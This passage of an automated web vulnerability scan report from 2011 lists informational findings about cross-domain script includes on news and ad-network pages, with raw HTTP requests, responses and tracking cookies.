P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=166
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:03 GMT
Connection: close
Content-Length: 1996

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='';var zzCusto
...[SNIP]...
</span>")
document.write('<script src="http://a1.interclick.com/getInPageJS.aspx?a=51&b=50020&cid=633862074462683028"> <\/script>
...[SNIP]...

18.10. http://finance.fox8live.com/inergize.wvue  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.fox8live.com
Path:   /inergize.wvue

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /inergize.wvue?Module=snapshot2&Output=JS HTTP/1.1
Host: finance.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:57 GMT
Server: nginx/0.8.15
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Mon, 09 May 2011 15:36:57 GMT
Expires: Mon, 09 May 2011 15:37:57 GMT
X-Cache: MISS from squid1.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid1.sv1.financialcontent.com:3128
Via: 1.0 squid1.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 40681

document.write('<style>\n');
document.write('\n');
document.write('\/* Global CSS Styles *\/\n');
document.write('.fcwidget * {\n');
document.write(' padding:0px; \n');
document.write(' border:0px; \n
...[SNIP]...
'head')[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src="http://edge.quantserve.com/quant.js";
head.appendChild(script);

var tcdacmd="dt";
document.write('<script src="http://an.tacoda.net/an/18181/slf.js"></script>
...[SNIP]...

18.11. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=5743098821&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456866&bpp=1&shv=r20110427&jsv=r20110427&prev_slotnames=8504762554&correlator=1304955456958&frm=0&adk=2931618045&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=3&dtd=130&xpc=trYOXTDiAY&p=http%3A//www.therepublic.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 09 May 2011 15:37:39 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 5101

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

18.12. http://ib.adnxs.com/ptj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ptj?member=311&inv_code=cm.rub_usatoday&size=728x90&imp_id=cm-49643098_1304955489,11f8f328940989e&referrer=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rub_usatoday%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-49643098_1304955489%2C11f8f328940989e%2Cweath%2Cax.{PRICEBUCKET}-am.h-am.b-cm.ent_h-cm.music_h-cm.weath_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-mm.ag1-mm.ak1-mm.am1-mm.aq1-idgt.careers_l%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D595286%3Bcontx%3Dweath%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dam.h%3Bbtg%3Dam.b%3Bbtg%3Dcm.ent_h%3Bbtg%3Dcm.music_h%3Bbtg%3Dcm.weath_h%3Bbtg%3Dti.aal%3Bbtg%3Dbz.25%3Bbtg%3Ddx.16%3Bbtg%3Ddx.23%3Bbtg%3Ddx.17%3Bbtg%3Drt.truecredit2%3Bbtg%3Dqc.ae%3Bbtg%3Dqc.ac%3Bbtg%3Dmm.ag1%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.am1%3Bbtg%3Dmm.aq1%3Bbtg%3Didgt.careers_l%3Bord%3D%5Btimestamp%5D%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIhboCEAoYASABKAEwnZSg7gQQnZSg7gQYAA..; acb933293=5_[r^kI/7Zw[-!!0nf8MAYR8I?enc=rkfhehSu4z-DwMqhRbbhPwAAAKCZmfk_g8DKoUW24T-uR-F6FK7jPzF8xuA56TROSsYda6b2ziUdCshNAAAAACgjBgA3AQAAGgEAAAIAAACoJgQAar8AAAEAAABVU0QAVVNEANgCWgCqAQAAFBABAgUCAAUAAAAA6yROvQAAAAA.&tt_code=cm.rub_usatoday&udj=uf%28%27a%27%2C+2248%2C+1304955445%29%3Buf%28%27c%27%2C+61473%2C+1304955445%29%3Buf%28%27r%27%2C+272040%2C+1304955445%29%3Bppv%287166%2C+%275635385468540845105%27%2C+1304955445%2C+1336491445%2C+61473%2C+49002%29%3B&cnd=!lxbphQih4AMQqM0QGAAg6v4CKAAxrkfhehSu4z9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABomgI.; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#0s(F?Mc9aQ3p9'^<S@I)Ql?!>Ae1f''iDi%3^'oLfC].kus@gU@%TxzHNX4[`WiVr*#9$vly>pFw2R!S3(%@w4<XPfGwI=KFxaLe[#mlK'C6EcG7hQU*o4SxrFd%j8zSG'hZ^D=OGMdEBEY11Uo_(eivJEYD@Ho?(^)etsLR7z'ns49!Ux5mR>#lMG'iLd<GTD$#AwtORJ@vBPA8q:p2Hv8s$nLSw`@cT6'=rqvg/PJyYt[-L!L(s`](-sRB6bA$j7/8l`/qMkYNHmLjx!j+Cat8-(!nXx8T`oWuF:Y11:LvJSN%2pSV-#:g'=Sb.-<6h+YEM%gG@w_9^gcM7pD=!j6CenGiB7>kko?i=<)!e3YI4KDvQEb`X8)alPKr$ETqBnzTMkQg+%-)erfq'IW*l8wrT7cUm4]3SP4j+tx.U-$'YUm@*y6x(A3H+*S0$getvNu.MeHeUf-#2%G*>DY/A<By?VIzutD*g8cKK+`6>[DwWqbhOid^wC>`:mn[J>?-#Fp6<W)3Xikw.$@ePbWiO6d:_'xt%OTZIzzfW[Loft(ZmLx[_-MtHVG'T'sPt9ssVv3fjt4@6bcwvH%-]h'oo`t?2P/4nA!gq([Ift!^HL*Xe]Z0f#*hQ*v9^cJiiW^]P3'vI-$iNx:M

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb933293=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIhboCEAoYAiACKAIw-pSg7gQQ-pSg7gQYAQ..; path=/; expires=Sun, 07-Aug-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb976848=5_[r^kI/7Zw[-!!0nf8M`P4+Q?enc=rkfhehSu4z-DwMqhRbbhPwAAAKCZmfk_g8DKoUW24T-uR-F6FK7jP-kewMldWkJ_SsYda6b2ziV6CshNAAAAACgjBgA3AQAAGgEAAAIAAACoJgQAar8AAAEAAABVU0QAVVNEANgCWgCqAQAA7w4BAgUCAAUAAAAAMiaD7wAAAAA.&tt_code=cm.rub_usatoday&udj=uf%28%27a%27%2C+2248%2C+1304955522%29%3Buf%28%27c%27%2C+61473%2C+1304955522%29%3Buf%28%27r%27%2C+272040%2C+1304955522%29%3Bppv%287166%2C+%279169991150143020777%27%2C+1304955522%2C+1336491522%2C+61473%2C+49002%29%3B&cnd=!lxbphQih4AMQqM0QGAAg6v4CKAAxrkfhehSu4z9CEwgAEAAYACABKP7__________wFIAFAAWKoDYABomgI.; path=/; expires=Tue, 10-May-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0s(F?MZ/Hw6M9'^<S2U@!:?!=5D/#m45DLc)]:#m<jG2QY%)hRUPZ6.4!Cb0i9=?30.f`PjN%)NSM//kC0GfkcGYCO$HhF^d['nn-tv@#2kF)yOv%i`W#'w@pXWlbX@KozXV?P%j2mWi''mY$RtWOF<qF)@r6l88[dN]UG=Cg'6e=Kr)o.lNx7D2455k84Xt8<q%R/M)Q=p!SOLo6tu%S_EeJ^:GYD4TUGhUm4.CNgIbZX.*re6y<W$9sinfkZpOX#nFRnlBD8wa<kDbX0b$=`p+d7!7BSY%A(+T1-o5S0z_Rd^<NMU_QC#:#.T^Pf$7NQIiv+vrUEZz?ev<SSWGAY$oK=Fv^a5y+e@0%>@s0.tp=06u`%C+I55#E`PitRt]Iybk+9_<RyC)=CdC*pD7Y?1ZyJIf.Td9aL+-m+X9eObnVw>-bFl([SwBJV$s(QxCPo=+Hxahx8F%6Up#-z[(vtS^9b>:Y8LjKq]1lgr4Gt2k:9?S<LQEXV.U+CsRZJJxfIcVy9O)ng(G7oG70.Svvb9D?J[!8F3#h)nmsRq!pN'v!t1(Wv+o8q!ljeG$lzm7.mX(XqI/.5#cJ*npWOxe@WJc(:Z?Glrik<f#h=MRDu^$G7q]fKvLsX*@iq2ohfr2k*HmPV[x.bB)wC$/+le_]y; path=/; expires=Sun, 07-Aug-2011 15:38:34 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 09 May 2011 15:38:34 GMT
Content-Length: 756

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rub_usatoday/;net=cm;u=,cm-49643098_1304955489,11f8f328940989e,weath,ax.40-am.h-am.b-cm.ent_h-cm.music_h-cm.weath
...[SNIP]...
</scr'+'ipt>');document.write('<script type="text/javascript" src="http://ev.ib-ibi.com/image.sbix?go=2269&pid=32&xid=2724386019227846218"></script>
...[SNIP]...

18.13. http://login.npr.org/openid/embed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://login.npr.org
Path:   /openid/embed

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /openid/embed?token_url=http%3A%2F%2Fwww.npr.org%2Ftemplates%2Freg%2Flogin-janrain-submit.php HTTP/1.1
Host: login.npr.org
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; s_cc=true; s_sq=nprorg%3D%2526pid%253D136128917-Mississippi%252520River%252520Could%252520Crest%252520Monday%252520At%252520Memphis%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.npr.org/%25253Futm_source%25253Dtopnav%252526utm_medium%25253Dtopnav%252526utm_campaign%25253Dtopnav%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:39:49 GMT
Content-Type: text/html
Last-Modified: Thu, 05 May 2011 02:07:43 GMT
Connection: keep-alive
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 4792

<!DOCTYPE html>
<html dir="ltr" >
<head>
<title>Sign in - Powered by Janrain</title>
<meta charset="UTF-8" />

<script src="https://s3.amazonaws.com/static.rpxnow.com/js/lib/rpx.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="http://cdn.rpxnow.com/rel/js/28a35f3454bf56715fe8f8b20c5b1fff.js" type="text/javascript"></script>
...[SNIP]...

18.14. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7108-2.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /a/4462/5032/7108-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; ses15=13549^1&13264^1&12590^2; csi15=3173215.js^2^1304949690^1304949693&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; cd=false; ruid=154dab7990adc1d6f3372c12^10^1304954976^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=4462/5032; rdk2=0; ses2=12590^2&13549^1&5032^5; csi2=3187892.js^3^1304955417^1304955486&3164882.js^1^1304954981^1304954981&3186629.js^1^1304954976^1304954976&3196046.js^2^1304949680^1304949693&3200913.js^1^1304949680^1304949680

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:11 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Mon, 09-May-2011 16:38:11 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 09-May-2011 16:38:11 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12590^2&13549^1&5032^6; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=58908; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3164882.js^2^1304954981^1304955491&3187892.js^3^1304955417^1304955486&3186629.js^1^1304954976^1304954976&3196046.js^2^1304949680^1304949693&3200913.js^1^1304949680^1304949680; expires=Mon, 16-May-2011 15:38:11 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Via: CN-5000
Proxy-Connection: Keep-Alive
Content-Length: 1460

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<script type="text/javascript">
rubicon_cb = Math.random(); rubicon_rurl = docum
...[SNIP]...
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
...[SNIP]...

18.15. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7108-2.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /a/4462/5032/7108-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; ses15=13549^1&13264^1&12590^2; csi15=3173215.js^2^1304949690^1304949693&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; cd=false; ruid=154dab7990adc1d6f3372c12^10^1304954976^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses2=12590^2&13549^1&5032^2; csi2=3164882.js^1^1304954981^1304954981&3186629.js^1^1304954976^1304954976&3196046.js^2^1304949680^1304949693&3200913.js^1^1304949680^1304949680

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:57 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Mon, 09-May-2011 16:36:57 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 09-May-2011 16:36:57 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12590^2&13549^1&5032^3; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=58982; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3187892.js^1^1304955417^1304955417&3164882.js^1^1304954981^1304954981&3186629.js^1^1304954976^1304954976&3196046.js^2^1304949680^1304949693&3200913.js^1^1304949680^1304949680; expires=Mon, 16-May-2011 15:36:57 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Via: CN-5000
Proxy-Connection: Keep-Alive
Content-Length: 1535

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<script type="text/javascript">
rubicon_cb = Math.random(); rubicon_rurl = docum
...[SNIP]...
<!-- begin ad tag-->
<script language="JavaScript" src="http://a.collective-media.net/adj/cm.rub_usatoday/;sz=728x90;ord=[timestamp]?" type="text/javascript"></script>
...[SNIP]...

18.16. http://r1-ads.ace.advertising.com/site=786652/size=728090/u=2/bnum=46632794/hr=10/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=786652/size=728090/u=2/bnum=46632794/hr=10/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /site=786652/size=728090/u=2/bnum=46632794/hr=10/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; F1=BUGCI3kAAAAAYm1CAEAA+DABAAAABAAAAIAA+DA; BASE=Rgwq9yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2uvWu4QL44U5Tp5J7h57WACK9DFolo7ZgEc+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp1J!; ROLL=boAno2C+ORAgA1G!; C2=foAyN5pqDIxFGekovMg3sYI7SKMCItdBwhQ3WXAcIsY4FAHC7opBwhA8NYAcI0eDGAHC6ijBwhgihXAcIsZ4FAHCv3gBwhQ3gZAcIMa4FAHCEGeBwhAmoZAcIwtlGAHCqGeBwhAxBaAcIca4FAHCA9qBwhAuBaAcIYnXGAHCWGoBwhg/VYAcIsN5FAHCr4oBwhwtZaAcIE0rGAHCNLqBwhgQvaAcIogmGAXtqOgGzaI71uKBhMrRYEZAEAazFEkZmjoxnG7IEwGlGjRj0jw+NX8bLiLBFAbhJV2KoaQUw6JBvHpxXVJ9EsuoGm0kQRANZX8Vs6OBBMnxXRrcEsNrGfVqHQwzeZ8VgCGBvCiBdPb1FQiqGuyovXw10Y4YRCsB7GdBM5a+GQ4kGm3sQZwSkaIho6vBh6lxK+5wGACHGJbt/fQl0aAEllOtGgUoWcQ3jYgRhy7BnrixHhpDHwyIGVyBcOqRlcQ82XUJpa0B1/lxTXIumN4CGASskgwbUaIRzaHCwTqxvN7NI0+oGAH; GUID=MTMwNDk1NTQyMzsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:38:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.981604.786652.0XMC
